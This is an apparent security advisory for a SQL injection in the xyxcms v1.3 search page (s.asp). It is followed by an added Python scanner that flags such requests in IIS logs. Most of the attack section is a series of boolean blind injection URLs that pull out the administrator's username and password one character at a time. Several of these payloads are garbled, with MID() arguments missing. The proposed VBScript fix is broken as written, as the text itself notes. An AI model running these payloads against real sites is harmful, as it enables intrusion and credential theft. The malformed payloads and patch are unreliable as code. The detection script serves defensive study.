Author: mars
Affected Versions: xyxcms v1.3
Official Address: www.xyxcms.com
Vulnerability Description: the search page (s.asp) does not filter the search keyword strictly, which allows a string-type SQL injection through the search function.
Code Analysis: in s.asp the keyword k is taken straight from the query string and used with no filtering at all, which is where the string-type injection comes from:
    ' k is read from the query string and passed on to the search query without any filtering
    k = request.queryString("k")
    page = request.queryString("page")
    if page = "" or isnumeric(page) = 0 then
        g_cur_page = 1
    else
        g_cur_page = cint(page)
    end if
Vulnerability test (exploitation method):
http://www.xxx.com/s.asp?k=1%25 AnD (SeLEcT CoUNt(*) FrOM admin)>=0 AnD %25 =
    guesses that the database has a table named admin
http://www.xxx.com/s.asp?k=1%25 AnD (SeLEcT CoUNt(*) FrOM admin)=1 AnD %25 =
    confirms that there is exactly one administrator account
http://www.xxx.com/s.asp?k=1%25 AnD (SeLEcT CoUNt(*) FrOM admin Where len(username)=4)=1 AnD %25 =
    the administrator account name is 4 characters long
http://www.xxx.com/s.asp?k=1%25 AnD (SeLEcT CoUNt(*) FrOM admin Where len(password)=8)=1 AnD %25 =
    the administrator password is 8 characters long
Username length: 4 characters
http://www.xxx.com/s.asp?k=1%25 AnD (SeLEcT AsC(MID(username,) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=109 AnD %25 =
    the first character of the username is m
http://www.xxx.com/s.asp?k=1%25 AnD (SeLEcT AsC(MID(username,) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=97 AnD %25 =
    the second character of the username is a
http://www.xxx.com/s.asp?k=1%25 AnD (SeLEcT AsC(MID(username,) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=114 AnD %25 =
    the third character of the username is r
http://www.xxx.com/s.asp?k=1%25 AnD (SeLEcT AsC(MID(username,) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=115 AnD %25 =
    the fourth character of the username is s
So the username is mars.
Password length: 8 characters
http://www.xxx.com/s.asp?k=1%25 AnD (SeLEcT AsC(MID(password,) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=49 AnD %25 =
    the first character of the password is 1
http://www.xxx.com/s.asp?k=1%25 AnD (SeLEcT AsC(MID(password,) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=50 AnD %25 =
    the second character of the password is 2
http://www.xxx.com/s.asp?k=1%25 AnD (SeLEcT AsC(MID(password,) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=51 AnD %25 =
    the third character of the password is 3
http://www.xxx.com/s.asp?k=1%25 AnD (SeLEcT AsC(MID(password,) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=52 AnD %25 =
    the fourth character of the password is 4
http://www.xxx.com/s.asp?k=1%25 AnD (SeLEcT AsC(MID(password,5,1)) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=113 AnD %25 =
    the fifth character of the password is q
http://www.xxx.com/s.asp?k=1%25 AnD (SeLEcT AsC(MID(password,6,1)) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=119 AnD %25 =
    the sixth character of the password is w
http://www.xxx.com/s.asp?k=1%25 AnD (SeLEcT AsC(MID(password,) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=113 AnD %25 =
    the seventh character of the password is q
http://www.xxx.com/s.asp?k=1%25 AnD (SeLEcT AsC(MID(password,) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub)=119 AnD %25 =
    the eighth character of the password is w
So the password is 1234qwqw.
Fix: filter the k parameter before it is used, for example:
    k = request.queryString("k")
    ' the character being tested for was lost in the available copy of this post;
    ' as written, instr(k, "") is always 1 in VBScript and would reject every search
    if instr(k, "") > 0 then
        response.write "<script>alert('error');window.close();</script>"
        response.end()
    end if
    page = request.queryString("page")
    if page = "" or isnumeric(page) = 0 then
        g_cur_page = 1
    else
        g_cur_page = cint(page)
    end if
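Rejecting single characters, as the patch above does, only stops the payload shape shown here; parameterized queries remove the injection itself, and reviewing the web server logs shows whether the search page has already been probed. The script below is an added example and is not code from xyxcms or from the original post. It assumes IIS W3C-format logs with the field order given in its header comment, and the log lines in SAMPLE_LOG are constructed to resemble the requests shown in this advisory (the `s.asp` path and `k` parameter come from the page; the client address, timestamps and status codes are made up). It percent-decodes the keyword and flags three things that the legitimate searches in the sample never show: a LIKE `%` wildcard directly followed by a boolean operator, a complete `SELECT ... FROM` inside the keyword, and SQL keywords in filter-evading mixed case such as `SeLEcT`.

```python
"""Flag boolean-based blind SQL injection attempts against s.asp in IIS W3C logs.

Added example for this advisory; not code from xyxcms or from the original post.
Assumes the common IIS W3C field order used in SAMPLE_LOG below. The sample
lines are constructed to resemble the requests shown in the advisory.
"""
import re
from urllib.parse import parse_qs

# Constructed sample log (not real traffic). Field order:
# date time s-ip cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query sc-status
2010-01-01 10:00:01 10.0.0.5 GET /s.asp k=cms 200
2010-01-01 10:00:02 10.0.0.5 GET /s.asp k=1%25+AnD+(SeLEcT+CoUNt(*)+FrOM+admin)%3E%3D0+AnD+%25+%3D 200
2010-01-01 10:00:03 10.0.0.5 GET /s.asp k=1%25+AnD+(SeLEcT+CoUNt(*)+FrOM+admin+Where+len(username)%3D4)%3D1+AnD+%25+%3D 200
2010-01-01 10:00:04 10.0.0.5 GET /s.asp k=100%25+cotton+shirt 200
2010-01-01 10:00:05 10.0.0.5 GET /s.asp page=abc 200
"""

# A LIKE '%...%' wildcard immediately followed by a boolean operator is the
# signature of breaking out of the search clause, as in "1% AnD (...)".
WILDCARD_BOOL = re.compile(r"%\s*(and|or)\b", re.IGNORECASE)
# A full SELECT ... FROM inside a search keyword is never a legitimate search.
SQL_SELECT = re.compile(r"\bselect\b.+?\bfrom\b", re.IGNORECASE | re.DOTALL)
# Keywords whose casing is checked for filter-evading mixed case ("SeLEcT").
KEYWORD = re.compile(r"\b(select|from|and|or|count|where|order|top)\b", re.IGNORECASE)


def parse_line(line):
    """Split one W3C log line into a dict; None for directives and short lines."""
    if not line or line.startswith("#"):
        return None
    parts = line.split()
    if len(parts) < 7:
        return None
    return {"time": parts[1], "client": parts[2], "method": parts[3],
            "uri": parts[4], "query": parts[5], "status": parts[6]}


def search_keyword(query):
    """Return the percent-decoded k parameter, or None if the request has none."""
    values = parse_qs(query, keep_blank_values=True).get("k")
    return values[0] if values else None


def mixed_case(word):
    """True for casing like 'SeLEcT' that is neither UPPER, lower nor Capitalized."""
    return not (word.isupper() or word.islower() or word == word.capitalize())


def analyze(keyword):
    """Return the list of reasons a decoded search keyword looks like injection."""
    reasons = []
    if WILDCARD_BOOL.search(keyword):
        reasons.append("LIKE wildcard followed by boolean operator")
    if SQL_SELECT.search(keyword):
        reasons.append("embedded SELECT ... FROM")
    mangled = [m.group(0) for m in KEYWORD.finditer(keyword) if mixed_case(m.group(0))]
    if mangled:
        reasons.append("case-mangled SQL keywords: " + ", ".join(mangled))
    return reasons


def scan_log(text):
    """Return one finding per suspicious request to /s.asp, in log order."""
    findings = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None or rec["uri"].lower() != "/s.asp":
            continue
        keyword = search_keyword(rec["query"])
        if keyword is None:
            continue
        reasons = analyze(keyword)
        if reasons:
            findings.append({"time": rec["time"], "client": rec["client"],
                             "keyword": keyword, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['time']} {f['client']} k={f['keyword']!r}")
        for r in f["reasons"]:
            print("    -", r)
```

Run against the constructed sample, the two injection requests are reported with all three reasons, while the ordinary keyword "cms", the harmless "100% cotton shirt" (a bare wildcard with no operator after it) and the request without a k parameter are left alone. Matching on the decoded value rather than the raw query string is what makes the `%25` encoding of the wildcard irrelevant, and checking keyword casing catches the mixed-case spelling that the requests above use to slip past simple keyword filters.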
Source: the waitalone blog (http://www.waitalone.cn/), original address: http://www.waitalone.cn/post/695.html